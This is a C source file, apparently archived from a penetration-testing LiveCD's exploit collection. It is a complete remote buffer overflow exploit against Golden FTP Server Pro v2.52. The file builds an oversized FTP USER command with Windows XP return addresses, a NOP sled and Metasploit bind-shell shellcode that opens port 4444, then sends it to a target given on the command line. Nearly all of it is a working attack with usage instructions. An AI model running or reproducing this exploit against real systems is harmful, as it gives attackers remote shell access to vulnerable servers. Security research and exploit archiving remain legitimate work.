home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / goldenftp / goldenftp.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-05-06  |  5KB  |  162 lines

---

1. /*
2. *
3. * Golden FTP Server Pro Remote Buffer Overflow Exploit
4. * Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)
5. * Exploit coded By ATmaCA
6. * Web: atmacasoft.com && spyinstructors.com
7. * E-Mail: atmaca@icqmail.com
8. * Credit to kozan and metasploit
9. * Usage:exploit <targetOs> <targetIp>
10. *
11. */
12.  
13. /*
14. *
15. * Vulnerable Versions:
16. * Golden FTP Server Pro v2.52
17. *
18. * Exploit:
19. * Run the exploit against the server. Afterward, right
20. * click on the Golden FTP Server Pro icon in the Windows tray and click
21. * Statistic.
22. * It will open bind shell on port 4444
23. *
24. */
25.  
26. #include <windows.h>
27. #include <stdio.h>
28.  
29. #pragma comment(lib, "ws2_32.lib")
30.  
31. char userreq[] =
32. "USER "
33. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
34. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
35. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
36. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
37. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
38. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
39. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
40. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
41.  
42. char *target[]= //return addr
43. {
44. "\xFC\x18\xD7\x77", //WinXp Sp1 Eng - jmp esp addr
45. "\xBF\xAC\xDA\x77" //WinXp Sp2 Eng - jmp esp addr
46. };
47.  
48. char shellcode[] =
49. /* win32_bind - EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub http://metasploit.com */
50. "\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x82"
51. "\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x6a\xd3\x9b\x6b"
52. "\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\xfa\x2b\x8b\x1f"
53. "\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x09\x2b\x8a\xa5"
54. "\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x69\xde\x5f\xc0"
55. "\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\xc9\xa1\x3b\x88"
56. "\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x42\x4e\xef\xd4"
57. "\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\xea\xa4\x2a\x9a"
58. "\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\xea\x5d\x17\xa6"
59. "\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\xdd\xa3\x81\xf2"
60. "\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x77\x87\x33\x6b"
61. "\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\xe4\x42\x75\xc8"
62. "\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x54\x40\x74\xc5"
63. "\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\xd7\xd5\xb4\xfc"
64. "\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x52\xb9\x0c\x73"
65. "\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\xe4\x42\x07\xf9"
66. "\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x60\x1b\xa4\x67"
67. "\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x29\x81\x0c\xe6"
68. "\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\xd3\x7b\x0e\x95"
69. "\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x7d\xfc\x0e\x6b"
70. "\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\xd0\xd5\xb4\xfc"
71. "\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94";
72.  
73. char nops[] =
74. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
75. "\x90\x90\x90\x90\x90\x90\x90\x90";
76.  
77. char passreq[] =
78. "PASS \r\n";
79.  
80. void main(int argc, char *argv[])
81. {
82. WSADATA wsaData;
83. WORD wVersionRequested;
84. struct hostent *pTarget;
85. struct sockaddr_in sock;
86. SOCKET mysocket;
87. char rec[1024];
88.  
89. if (argc < 3)
90. {
91. printf("\r\nGolden FTP Server Pro Remote Buffer Overflow Exploit\r\n",argv[0]);
92. printf("Bug Discovered by Reed Arvin (http://reedarvin.thearvins.com)\r\n");
93. printf("Exploit coded By ATmaCA\r\n");
94. printf("Web: atmacasoft.com && spyinstructors.com\r\n");
95. printf("Credit to kozan and metasploit\r\n");
96. printf("Usage:\r\nexploit <targetOs> <targetIp>\r\n\r\n",argv[0]);
97. printf("Targets:\n");
98. printf("1 - WinXP SP1 english\n");
99. printf("2 - WinXP SP2 english\n");
100. printf("Example:exploit 2 127.0.0.1\n");
101.  
102. return;
103. }
104. int targetnum = atoi(argv[1]) - 1;
105.  
106. char *evilbuf = (char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops)
107. +sizeof(passreq)+7);
108. strcpy(evilbuf,userreq);
109. strcat(evilbuf,target[targetnum]);
110. strcat(evilbuf,nops);
111. strcat(evilbuf,shellcode);
112. strcat(evilbuf,"\r\n");
113. strcat(evilbuf,passreq);
114. //printf("%s",evilbuf);
115.  
116. wVersionRequested = MAKEWORD(1, 1);
117. if (WSAStartup(wVersionRequested, &wsaData) < 0) return;
118.  
119.  
120.  
121. mysocket = socket(AF_INET, SOCK_STREAM, 0);
122. if(mysocket==INVALID_SOCKET){
123. printf("Socket error!\r\n");
124. exit(1);
125. }
126.  
127. printf("Resolving Hostnames...\n");
128. if ((pTarget = gethostbyname(argv[2])) == NULL){
129. printf("Resolve of %s failed\n", argv[1]);
130. exit(1);
131. }
132.  
133. memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
134. sock.sin_family = AF_INET;
135. sock.sin_port = htons(21);
136.  
137. printf("Connecting...\n");
138. if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
139. printf("Couldn't connect to host.\n");
140. exit(1);
141. }
142.  
143. printf("Connected!...\n");
144. printf("Waiting for welcome message...\n");
145. Sleep(10);
146. recv(mysocket,rec,1024,0);
147.  
148. printf("Sending evil request...\n");
149. if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
150. printf("Error Sending evil request.\r\n");
151. closesocket(mysocket);
152. exit(1);
153. }
154.  
155. Sleep(10);
156. printf("Success.\n");
157. closesocket(mysocket);
158. WSACleanup();
159. }
160.  
161. automation
162.